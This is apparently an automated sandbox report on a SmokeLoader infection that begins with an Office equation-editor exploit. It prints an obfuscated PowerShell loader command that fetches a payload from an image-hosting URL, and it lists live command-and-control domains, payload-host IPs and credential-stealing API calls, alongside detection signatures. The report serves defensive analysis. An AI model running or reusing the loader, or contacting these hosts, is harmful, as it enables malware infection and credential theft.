Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3520, TargetFilename: C:\Users\user\AppData\Local\Temp\2kro4ew5.lct.ps1

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Snort Signatures

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.22 - Destination IP: 77.232.129.190

Timestamp:	05/27/24-18:36:08.149095
SID:	2039103
Source Port:	49176
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Malicious Base64 Encoded Payload In Image - Source IP: 188.114.97.3 - Destination IP: 192.168.2.22

Timestamp:	05/27/24-18:35:39.953040
SID:	2049038
Source Port:	443
Destination Port:	49174
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Windows executable base64 encoded - Source IP: 188.114.97.3 - Destination IP: 192.168.2.22

Timestamp:	05/27/24-18:35:37.303035
SID:	2018856
Source Port:	443
Destination Port:	49174
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Base64 Encoded MZ In Image - Source IP: 188.114.97.3 - Destination IP: 192.168.2.22

Timestamp:	05/27/24-18:35:37.303035
SID:	2047750
Source Port:	443
Destination Port:	49174
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Powershell commands sent B64 3 - Source IP: 188.114.97.3 - Destination IP: 192.168.2.22

Timestamp:	05/27/24-18:35:39.401568
SID:	2025012
Source Port:	443
Destination Port:	49174
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Found malware configuration

Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Multi AV Scanner detection for domain / URL

Source: uploaddeimagens.com.br	Virustotal: Detection: 5%	Perma Link
Source: http://198.46.177.156/8080/RBG.txt	Virustotal: Detection: 8%	Perma Link
Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634	Virustotal: Detection: 12%	Perma Link
Source: https://uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc	Virustotal: Detection: 8%	Perma Link

Source: C:\Windows\explorer.exe	Code function: 14_2_03F15174 CryptAcquireContextA,	14_2_03F15174
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00083098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	18_2_00083098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00083717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	18_2_00083717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00083E04 RtlCompareMemory,CryptUnprotectData,	18_2_00083E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00081198 CryptBinaryToStringA,CryptBinaryToStringA,	18_2_00081198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000811E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	18_2_000811E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_0008123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	18_2_0008123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00081FCE CryptUnprotectData,RtlMoveMemory,	18_2_00081FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_000826AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	21_2_000826AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_0008178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	22_2_0008178C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_0008118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	22_2_0008118D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_00082404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	24_2_00082404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_0008245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	24_2_0008245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_0008263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	24_2_0008263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 28_2_000C2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	28_2_000C2799
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 28_2_000C25A4 CryptBinaryToStringA,CryptBinaryToStringA,	28_2_000C25A4

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 198.46.177.156 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Jump to behavior

Source: ~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp.4.dr	Stream path '_1778318474/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp.4.dr	Stream path '_1778318479/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49172 version: TLS 1.2

Source:	Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.454053406.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: rugtucw, 00000010.00000000.504303884.0000000000F92000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
Source:	Binary string: RegAsm.pdb4 source: rugtucw, 00000010.00000000.504303884.0000000000F92000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
Source:	Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.454053406.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00081D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	18_2_00081D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00083ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	18_2_00083ED9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00082B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	18_2_00082B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,	21_2_0008255C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,	22_2_000815BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	22_2_000814D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,	22_2_000813FE
Source: C:\Windows\explorer.exe	Code function: 23_2_000E1EB4 FindFirstFileW,	23_2_000E1EB4
Source: C:\Windows\explorer.exe	Code function: 23_2_000E1DB0 FindFirstFileW,	23_2_000E1DB0

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: global traffic	DNS query: name: z2.ink
Source: global traffic	DNS query: name: z2.ink
Source: global traffic	DNS query: name: z2.ink
Source: global traffic	DNS query: name: z2.ink
Source: global traffic	DNS query: name: z2.ink
Source: global traffic	DNS query: name: z2.ink
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: uploaddeimagens.com.br
Source: global traffic	DNS query: name: prolinice.ga
Source: global traffic	DNS query: name: prolinice.ga
Source: global traffic	DNS query: name: prolinice.ga
Source: global traffic	DNS query: name: prolinice.ga

Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
